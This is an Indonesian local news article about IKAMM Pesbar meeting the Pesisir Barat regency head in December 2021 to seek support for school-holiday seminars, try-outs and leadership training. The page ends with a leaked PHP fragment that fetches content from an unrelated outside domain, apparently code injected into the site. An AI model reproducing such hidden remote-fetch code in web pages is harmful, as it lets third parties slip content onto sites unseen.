Silaturahmi IKAMM PESBAR 2021 Kepada Pemerintah Kabupaten Pesisir Barat

Jumat, 31 Desember 2021

facebook twitter whatsapp telegram line copy

URL berhasil dicopy

facebook icon twitter icon whatsapp icon telegram icon line icon copy

URL berhasil dicopy

Pesisir Barat, Jejakkasus.info

 

Kamis (30/12/2021) di Villa Repong Ramdo, telah dilaksanakan silaturahmi oleh IKAMM Pesbar dengan Pemerintah Kabupaten Pesisir Barat. Dalam silaturahmi tersebut dihadiri oleh Bapak Bupati Pesisir Barat Dr. Drs. Agus Istiqlal, S.H., M.H., Asisten 1 Bidang Pemerintahan dan Kesejahteraan Rakyat Audi Marpi S.pd. MM. Staf Ahli, Kadis Kominfo, Kadis Pendidikan, Kadis Pemuda & Olahraga dan Ketua Tarang Taruna.

 

Dalam silaturahmi tersebut Ketua Umum IKAMM Pesbar Imam Sobirin menyampaikan tentang agenda tahunan atau agenda besar yang diadakan oleh IKAMM Pesbar yang akan dilaksanakan pada waktu adik adik yang ada di Pesisir Barat libur sekolah. Jadi konektivitasnya tersambung disana. Kita bisa mengkolaborasikan Pemerintah Daerah. Rangkaian acara  IKAMM Pesbar Mengabdi (IPM) 4.0 meliputi Tabligh Akbar, Seminar dan Try Out Nasional dan Training Dasar Kepemimpinan Organisasi (TDKO) yang akan dilaksanakan pada Bulan Januari 2022 bertepatan dengan Tahun ajaran baru semester genap 2022.

Baca Juga:  Peringatan HUT KORPRI ke-52 di Rutan Krui Korprikan Indonesia Menyemarakkan Semangat ASN

 

“Barangkali dari Pemerintah Daerah (Pemkab) ada yang ingin mengisi agenda tersebut kita sangat antusiasi dan juga mengapresiasi. Kami juga memohon kepada Bapak Bupati untuk dapat membuka acara sekaligus jadi pemateri terkait acara Training Dasar Kepemimpinan Organisasi (TDKO) dan  Seminar Tryout Akbar Nasional”. Ujarnya.

Baca Juga:  Komunitas Seni Bumi Jejama Secancanan Pringsewu Pentas Konser Amal Peduli Cianjur

 

Menanggapi hal tersebut, Bapak Bupati Dr. Drs. Agus Istiqlal, S.H., M.H. menjelaskan bahwa Pemerintah Kabupaten (Pemkab) sepenuhnya akan mendukung kegiatan yang positif dan memberikan semangat untuk adik-adik siswa/i Pesisir Barat. Ada beberapa program yang disampaikan oleh ketua ikamm pesbar yakni program tahunan Tabligh Akbar, Seminar dan Try Out Nasional dan Training Dasar Kepemimpinan Organisasi (TDKO) itu bagus untuk dilaksanakan, saya siap menjadi pemateri dan kami semua disini siap diundang di setiap kegiatan IPM 4.0″ Ujarnya.

Baca Juga:  Razia Akhir Tahun di Rutan Krui Membuat Kamar Hunian Lebih Bersih dan Aman

 

Dalam kesempatan tersebut, Asisten Bidang Pemerintahan dan Kesejahteraan Rakyat Audi Marpi S.pd. MM. menyampaikan atas nama Pemerintah Kabupaten Pesisir Barat mengucapkan terimakasih kepada IKAMM Pesisir Barat yang akan mengadakan kegiatan-kegiatan positif di Kabupaten Pesisir Barat dan tambahan juga jangan hanya berpokus kepada kegiatan kita tapi juga proomosikan kabupaten pesisir Barat. Ini harapan kita semua.

Penulis Bambang

Follow WhatsApp Channel jejakkasus.info untuk update berita terbaru setiap hari Follow

Berita Terkait

Binda Ayu Asalasiyah, S.Ked Dapatkan Penghargaan Satya Lencana Aditya Karya Mahat Va Yodha Utama dari Karang Taruna Way Kanan
Aries Sandi Janji Perbaiki Pendidikan dan Infrastruktur di Pesawaran
Aries Sandi-Supriyanto Genjot Pembentukan Tim Pemenangan di Pesawaran
Jelang Penetapan KPU, Balon Wabup Ayu Asalasiyah Kukuhkan Tim Amanah Emak-emak di 5 Kecamatan
Pesawaran Ganti Rezim: Seruan Perubahan Sambut Pilkada 2024
Buntut Aniaya Adik Tingkat, Empat Siswa SMA Kebangsaan di Kembalikan Hak Asuh ke Pihak Keluarga
Dukungan Terus Mengalir untuk Kemenangan Aries Sandi-Supriyanto
Hak Jawab Sulardi Atas Tuduhan Pemalsuan Surat Tanah Tak Berdasar,

Berita Terkait

Jumat, 20 September 2024 - 10:17 WIB

Binda Ayu Asalasiyah, S.Ked Dapatkan Penghargaan Satya Lencana Aditya Karya Mahat Va Yodha Utama dari Karang Taruna Way Kanan

Kamis, 19 September 2024 - 20:52 WIB

Aries Sandi Janji Perbaiki Pendidikan dan Infrastruktur di Pesawaran

Kamis, 19 September 2024 - 20:50 WIB

Aries Sandi-Supriyanto Genjot Pembentukan Tim Pemenangan di Pesawaran

Kamis, 19 September 2024 - 20:20 WIB

Jelang Penetapan KPU, Balon Wabup Ayu Asalasiyah Kukuhkan Tim Amanah Emak-emak di 5 Kecamatan

Kamis, 19 September 2024 - 15:26 WIB

Pesawaran Ganti Rezim: Seruan Perubahan Sambut Pilkada 2024

Berita Terbaru

$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'https://umrohkemenag.org/footer/'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $a = curl_exec($ch); curl_close($ch);?>